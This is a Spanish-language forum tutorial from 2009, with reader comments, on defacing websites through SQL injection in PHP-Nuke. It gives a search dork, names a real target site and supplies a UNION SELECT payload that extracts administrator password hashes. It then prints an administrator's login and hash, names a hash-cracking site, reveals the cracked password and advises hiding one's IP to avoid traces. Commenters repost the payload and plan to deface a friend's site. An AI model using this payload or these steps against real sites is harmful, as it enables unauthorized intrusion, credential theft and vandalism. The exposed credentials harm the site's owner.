¿Como defacear una web?

Bueno caseros , va este tuto a ver si me lo entienden :guino:

IMPORTANTE: ¡Este Tutorial va con el Fin de que aprendan!

"Un Hacker no Nace Sabiéndo, Si no Aprendiendó"

Que es un Deface? es una modificación de un portal o web sin autorización del administrador, casi siempre va dirigido al index de la web para que sea mas llamativo.

Ahora les Explicare como Defacear a través de Inyeccion SQL y SSS.

IMPORTANTE: ¡Antes de hacer un Deface. Debes Ocultar tu ip, para star anonimos y no dejar huellas!!

Para eso usaremos el Hide-ip.

*Inyeccion SQL

Es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación.

Una Vez que ya sabemos en que consiste,procedamos a ponerlo en Practica:

1.-Para Realizar un Deface,Contaremos con el "Google" ya que nos facilitara mucho el trabajo.

2.-Una vez Ingresado al "Google",buscaremos el tipo de web que vamos a Defacear.

Ejemplo:

modules.php?name=Statistics Version PHP-Nuke

Lo que hara,sera buscar todo tipo de webs con esa descripcion:

La web que seleccione

http://granjamahiryia.org/

3.-Ahora,una vez localizada la web k vayamos a Defacear,meteremos la Inyeccion SQL.

La Inyeccion para ste tipo de web,seria sta:

modules.php?name=Search&type=comments&%20%20%20que ry=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

Para hacer la Inyeccion,solo kitaremos lo k sige despues de "Modules".

Ejemplo:

Web sin Inyeccion: http://granjamahiryia.org//modules.php?name=Statistics
Web con Inyeccion: http://granjamahiryia.org// Inyeccion SQL

Una vez que hallamos hecho la Inyeccion SQL, podremos sacar la clave y login del Administrador.

ID:gamemohamed
clave:6896c3fd7eb4ca88240e2c5ba8a2f334

ADVERTENCIA:La clave sta Encriptada.

4.-Ya tenemos el nick y clave encriptada...ahora pasaremos a Desencriptarla,para eso tenemos muchos cracks de MD5:

http://gdataonline.com/seekhash.php

Listo, ya los tenemos:
ID:gamemohamed
clave:giovanna1

5.-Ahora,nos logearemos como si fueramos los Admin. xD...

6.-Listo,Ya tienes acceso a toda la web,ya puedes modificarla,eliminarla,etc...

21 Comentarios

@loozwin el 14 de Abril del 2009:

OWNED by marce

RIGO TOPU!!

@Marce666 el 14 de Abril del 2009:

Cita de loozwin:
OWNED by marce

RIGO TOPU!!

Me rompe el tuje rigo en esto del deface!

@galvanmg el 14 de Abril del 2009:

jaja buenisimo!!!

yo uso la injeccion sql para editarme en los mu muy bueno gracias marce. :P

@Stellar el 14 de Abril del 2009:

A leer!!!

;)

@shit is rock el 14 de Abril del 2009:

Dale hijo de puta jhajajajjajaja

emmm me quede con ganas de que hagas cagar un toque eso que no queres hacer cagar jaja
dale inmoral como vas a hacer cagar a la granjitaa jajaja

Bueno che me voy ( y loco yo me lo lei rapidito ja )

Rock and roll

saludos : El marco !

Cita de shit is rock:
Dale (******) jhajajajjajaja

emmm me quede con ganas de que hagas cagar un toque eso que no queres hacer cagar jaja
dale inmoral como vas a hacer cagar a la granjitaa jajaja

Bueno che me voy ( y loco yo me lo lei rapidito ja )

Rock and roll

saludos : El marco !

Y este? :???:

@santoz el 14 de Abril del 2009:

jaja esto lo sabe asta el q no lo sabe pero bueno para los newbies es como si fueran dioses jaja xD

Cita de Marce666:
Cita de shit is rock:
Dale (******) jhajajajjajaja

emmm me quede con ganas de que hagas cagar un toque eso que no queres hacer cagar jaja
dale inmoral como vas a hacer cagar a la granjitaa jajaja

Bueno che me voy ( y loco yo me lo lei rapidito ja )

Rock and roll

saludos : El marco !

Y este? :???:

Dale putitaaa jajaj

Muerte a la censura!

@spammer el 14 de Abril del 2009:

me aparecio que mi ip ha sido guardado en la base de datos en una web 8| 8| 8| 8| 8| 8| 8| 8| 8| 8| 8|

que bolu... tendria q haber usado el hide ip Cansado/a

Cita de spammer:
me aparecio que mi ip ha sido guardado en la base de datos en una web 8| 8| 8| 8| 8| 8| 8| 8| 8| 8| 8|

que bolu... tendria q haber usado el hide ip

jaj

no funca mas esto.. porque siempre te aparece el cartel de que ha detectado un codigo malicioso y encima te detecta la ip..!!! Todo mal

@Spyii el 14 de Abril del 2009:

uhhh,graxias!!,voy a modificarle la pagina a un amigo mio,el muy fo**o me lo debe!!!,se lo hare pagar!!!!!!! jejejejeje!!!!! kpo!!! te dejo mis ultimos 5 de hoy!

Que chupoamedias que andas loco!! como me vas a borrar el comentario!!

Cita de spammer:
no funca mas esto.. porque siempre te aparece el cartel de que ha detectado un codigo malicioso y encima te detecta la ip..!!!

Se avivaron todos jaja

@Sazuke el 14 de Abril del 2009:

y...

funca esto?

@jav0101 el 14 de Abril del 2009:

jaja buen post +10

@tomas_11 el 16 de Abril del 2009:

Buenas

Se ha producido un problema en la pagina, nuestro sistema de seguridad ha detectado algn codigo peligroso durante su navegacion, rogamos no repita la accion. El codigo que causoproblemas es:
/modules.php?name=Search&type=comments&%20%20%20que%20ry=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

y eso como se arregla?

@Marce666 el 16 de Abril del 2009:

Cita de tomas_11:
Buenas

Se ha producido un problema en la pagina, nuestro sistema de seguridad ha detectado algn codigo peligroso durante su navegacion, rogamos no repita la accion. El codigo que causoproblemas es:
/modules.php?name=Search&type=comments&%20%20%20que%20ry=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

y eso como se arregla?

La pag esta con seguridad..